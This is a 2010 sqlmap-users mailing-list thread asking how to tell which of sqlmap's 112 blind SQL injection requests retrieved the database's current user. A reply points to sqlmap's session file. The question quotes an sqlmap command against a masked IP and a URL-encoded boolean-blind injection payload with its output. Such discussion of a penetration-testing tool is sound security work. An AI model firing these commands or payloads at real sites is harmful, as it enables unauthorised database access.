[sqlmap-users] Fw: Which get was the right

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

For example, you run:

sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"

After the execution you find the current user:

[00:11:15] [INFO] retrieved: usqli@localhost
[00:11:15] [DEBUG] performed 112 queries in 87 seconds
SELECT CURRENT_USER():    'usqli@localhost'

But the results say that 112 queries were tried, like:

something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1

How can I know which one of the 112 got the result?

________________________________

From:Ignacio
Hernández [mailto:nac...@gm...] 
Sent: Miércoles, 20 de Enero de
2010 06:10 p.m.
To: Duran, Beatriz
Subject: Re: [sqlmap-users] Which
get was the right

HI Beatriz

When you run sqlmap against a target and one of the tests succeeds, sqlmap
tells you that. It tells you the quotes (single or doubles) and the nomber of
parenthesis needed to inject sql code. On lasts versions of sqlmap it does the
tests just one time and stores the data to a file telling you where this file
is each time you start sqlmap against the same target, for example:
[00:59:06] [INFO] using '/home/nacho/sqlmap/output/www.target.com/session' as session
file

You can open that file and see there what test worked.

Sorry about my english im spanish :)

2010/1/20 Duran, Beatriz 

Hi, after you ran sqlmap to get for example, the list of
tables; it gives you the query applied but how could you know which test was
the one that worked? 

Thanks,

------------------------------------------------------------------------------
Throughout its 18-year history, RSA Conference consistently attracts the
world's best and brightest in the field, creating opportunities for Conference
attendees to learn about information security's most important issues through
interactions with peers, luminaries and emerging and established companies.
http://p.sf.net/sfu/rsaconf-dev2dev
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

		KPMG esta comprometido con la responsabilidad ambiental.

		Por favor, considere el medio ambiente antes de imprimir este e-mail. 

		The information in this e-mail is confidential and may be legally 
		privileged. It is intended solely for the addressee. If you are not the 
		intended recipient, any disclosure, copying, distribution or any action 
		taken or omitted to be taken in reliance on it, is prohibited and may be 
		unlawful. 

		KPMG cannot guarantee that e-mail communications are secure or 
		error-free, as information could be intercepted, corrupted, amended, 
		lost, destroyed, arrive late or incomplete, or contain viruses.

		The opinions or professional criteria provided by our Firm are issued 
		formally through a document drafted in the Firm's letterhead and signed 
		by the partner or director responsible for the service; consequently, 
		the contents and/or documentation relating to this communication may 
		include opinions, recommendations or other information that should not 
		be used as basis or grounds for influencing any decisions. Furthermore, 
		there can be no guarantee that the information contained in this e-mail 
		is accurate as of the date it is received or that it will continue to be 
		accurate in the future. In this sense, the Firm assumes no 
		responsibility, civil or otherwise for information included herein or 
		for any potential errors or inaccuracies this document may contain.

		KPMG Cardenas Dosal, S .C. is a Mexican partnership and the Mexican 
		member firm of the KPMG network of independent firms affiliated with 
		KPMG International Cooperative (KPMG International), a Swiss entity. 
		KPMG International Cooperative (KPMG International) is a Swiss entity. 
		Member firms of the KPMG network of independent firms are affiliated 
		with KPMG International. KPMG International provides no client services. 
		No member firm has any authority to obligate or bind KPMG International 
		Cooperative or any other member firm vis-à-vis third parties, nor does 
		KPMG International Cooperative have any such authority to obligate or 
		bind any member firm in any manner whatsoever. Each member firm is a 
		legally distinct and separate entity. 